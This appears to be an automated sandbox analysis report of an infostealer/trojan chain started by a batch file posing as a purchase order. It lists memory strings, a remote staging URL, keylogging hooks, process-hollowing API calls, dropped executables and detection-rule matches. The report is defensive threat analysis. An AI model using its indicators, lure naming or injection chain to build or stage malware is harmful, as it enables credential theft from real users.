Source: neworigin.exe, 0000000D.00000002.1726699852.0000000006707000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.000000000301E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834898990.0000000005576000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3838990479.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834255661.0000000005550000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.0000000001036000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3840124284.000000000672F000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.00000000030BD000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3786952133.00000000010D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: neworigin.exe, 0000000D.00000002.1726699852.0000000006707000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.000000000301E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834898990.0000000005576000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3838990479.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834255661.0000000005550000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.0000000001036000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3840124284.000000000672F000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.00000000030BD000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3786952133.00000000010D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: neworigin.exe, 0000000D.00000000.1467200681.0000000000A62000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: https://account.dyn.com/
Source: powershell.exe, 00000010.00000002.1555969400.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: neworigin.exe, 0000000D.00000002.1624352397.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000000.1467200681.0000000000A62000.00000002.00000001.01000000.00000009.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002BAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org
Source: neworigin.exe, 0000000D.00000002.1624352397.0000000002D41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/
Source: neworigin.exe, 0000000D.00000002.1624352397.0000000002D41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/t
Source: powershell.exe, 00000010.00000002.1607520049.0000000005C0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000010.00000002.1607520049.0000000005C0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000010.00000002.1607520049.0000000005C0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000010.00000002.1555969400.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: x.exe, 00000004.00000002.1464571050.0000000000696000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com/
Source: x.exe, 00000004.00000002.1522045362.0000000020DAD000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com/yak/233_Wisrysx
Source: x.exe, 00000004.00000002.1522045362.0000000020DC3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020D98000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1464571050.000000000067A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com/yak/233_Wisrysxlfss
Source: x.exe, 00000004.00000002.1464571050.000000000067A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com/yak/233_WisrysxlfsseV
Source: x.exe, 00000004.00000002.1464571050.000000000062E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com:443/yak/233_Wisrysxlfss
Source: powershell.exe, 00000010.00000002.1607520049.0000000005C0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown HTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.10:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49775 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49797 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\neworigin.exe
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\neworigin.exe
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window created: window name: CLIPBRDWNDCLASS

System Summary

Source: 13.0.neworigin.exe.a60000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: server_BTC.exe.12.dr, opqcmgIPmeabY.cs Long String: Length: 17605
Source: TrojanAIbot.exe.14.dr, opqcmgIPmeabY.cs Long String: Length: 17605
Source: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat Static file information: 1393123
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E58670 NtUnmapViewOfSection, 4_2_02E58670
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E58400 NtReadVirtualMemory, 4_2_02E58400
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E57A2C NtAllocateVirtualMemory, 4_2_02E57A2C
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E5DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 4_2_02E5DC8C
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E5DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile, 4_2_02E5DC04
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E58D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 4_2_02E58D70
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E5DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, 4_2_02E5DD70
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E57D78 NtWriteVirtualMemory, 4_2_02E57D78
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E57A2A NtAllocateVirtualMemory, 4_2_02E57A2A
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E5DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile, 4_2_02E5DBB0
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E58D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 4_2_02E58D6E
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 26_2_02F38670 NtUnmapViewOfSection, 26_2_02F38670
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 26_2_02F38400 NtReadVirtualMemory, 26_2_02F38400
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 26_2_02F37A2C NtAllocateVirtualMemory, 26_2_02F37A2C
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 26_2_02F38D70 Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread, 26_2_02F38D70
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 26_2_02F3DD70 NtOpenFile,NtReadFile,NtClose, 26_2_02F3DD70
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 26_2_02F37D78 NtWriteVirtualMemory, 26_2_02F37D78
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 26_2_02F386F7 NtUnmapViewOfSection, 26_2_02F386F7
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 26_2_02F37AC9 NtAllocateVirtualMemory, 26_2_02F37AC9
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 26_2_02F37A2A NtAllocateVirtualMemory, 26_2_02F37A2A
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 26_2_02F38D6E Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread, 26_2_02F38D6E
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 32_2_02EF8670 NtUnmapViewOfSection, 32_2_02EF8670
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 32_2_02EF8400 NtReadVirtualMemory, 32_2_02EF8400
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 32_2_02EF7A2C NtAllocateVirtualMemory, 32_2_02EF7A2C
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 32_2_02EF7D78 NtWriteVirtualMemory, 32_2_02EF7D78
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 32_2_02EF8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 32_2_02EF8D70
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 32_2_02EFDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose, 32_2_02EFDD70
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 32_2_02EF86F7 NtUnmapViewOfSection, 32_2_02EF86F7
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 32_2_02EF7A2A NtAllocateVirtualMemory, 32_2_02EF7A2A
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 32_2_02EFDBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 32_2_02EFDBB0
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 32_2_02EFDC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose, 32_2_02EFDC8C
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 32_2_02EFDC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 32_2_02EFDC04
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 32_2_02EF8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 32_2_02EF8D6E
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E5F7C8 InetIsOffline,CoInitialize,CoUninitialize,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess, 4_2_02E5F7C8
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E420C4 4_2_02E420C4
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_0121AA42 13_2_0121AA42
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_0121EA80 13_2_0121EA80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_01214A98 13_2_01214A98
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_0121DF00 13_2_0121DF00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_01213E80 13_2_01213E80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_012141C8 13_2_012141C8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_0121DF00 13_2_0121DF00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_06A956B8 13_2_06A956B8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_06A966E8 13_2_06A966E8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_06A9C2A0 13_2_06A9C2A0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_06A9B32A 13_2_06A9B32A
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_06A93178 13_2_06A93178
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_06A97E78 13_2_06A97E78
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_06A97798 13_2_06A97798
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_06A9E4C0 13_2_06A9E4C0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_06A92350 13_2_06A92350
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_06A90040 13_2_06A90040
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_06A95DDF 13_2_06A95DDF
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_06A90006 13_2_06A90006
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Code function: 14_2_009885B7 14_2_009885B7
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Code function: 14_2_009885C8 14_2_009885C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_0499B490 16_2_0499B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_0499B470 16_2_0499B470
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 20_2_065EDAAC 20_2_065EDAAC
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 20_2_065E1B94 20_2_065E1B94
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 20_2_065EE608 20_2_065EE608
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 20_2_065E25B8 20_2_065E25B8
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 20_2_065E25A8 20_2_065E25A8
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 20_2_065E4174 20_2_065E4174
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 20_2_065E1D20 20_2_065E1D20
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 20_2_065E1B88 20_2_065E1B88
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 20_2_06663360 20_2_06663360
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 26_2_02F220C4 26_2_02F220C4
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_011641C8 29_2_011641C8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_01164A98 29_2_01164A98
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_0116EA80 29_2_0116EA80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_0116DF00 29_2_0116DF00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_01163E80 29_2_01163E80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_0116DF00 29_2_0116DF00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_0116A988 29_2_0116A988
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_069256B8 29_2_069256B8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_069266E8 29_2_069266E8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_06927E78 29_2_06927E78
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_0692C2A0 29_2_0692C2A0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_0692B32A 29_2_0692B32A
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_06923178 29_2_06923178
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_06927798 29_2_06927798
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_0692E4C0 29_2_0692E4C0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_06925DDF 29_2_06925DDF
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_06922350 29_2_06922350
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_06920040 29_2_06920040
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_06920006 29_2_06920006
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 32_2_02EE20C4 32_2_02EE20C4
Source: Joe Sandbox View Dropped File: C:\Users\Public\Libraries\lxsyrsiW.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 02E44860 appears 949 times
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 02E44500 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 02E444DC appears 74 times
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 02E5894C appears 56 times
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 02E589D0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 02E446D4 appears 244 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: String function: 02F24860 appears 683 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: String function: 02F3894C appears 50 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: String function: 02F246D4 appears 155 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: String function: 02EF894C appears 50 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: String function: 02EE46D4 appears 155 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: String function: 02EE4860 appears 683 times
Source: 13.0.neworigin.exe.a60000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: armsvc.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: classification engine Classification label: mal100.spre.troj.spyw.evad.winBAT@55/27@3/3
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E47FD4 GetDiskFreeSpaceA, 4_2_02E47FD4
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E56DC8 CoCreateInstance, 4_2_02E56DC8
Source: C:\Users\user\AppData\Local\Temp\x.exe File created: C:\Users\Public\Libraries\PNO
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Mutant created: \Sessions\1\BaseNamedObjects\kbedaSzAAOYDRDgN
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-74b31e1c42af9477-inf
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3496:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5480:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-74b31e1c42af9477cd68e75b-b
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\user\AppData\Local\Temp\CAB08060.TMP
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat" "
Source: C:\Users\user\AppData\Local\Temp\x.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\x.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
